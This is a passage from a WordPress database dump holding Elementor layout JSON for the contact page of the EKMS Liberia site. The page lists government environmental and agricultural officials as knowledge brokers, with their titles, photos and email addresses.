d\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24509,3617,'_elementor_edit_mode','builder'),(24510,3617,'_elementor_template_type','wp-page'),(24511,3617,'_elementor_version','3.0.16'),(24512,3617,'_wp_page_template','default'),(24513,3617,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a 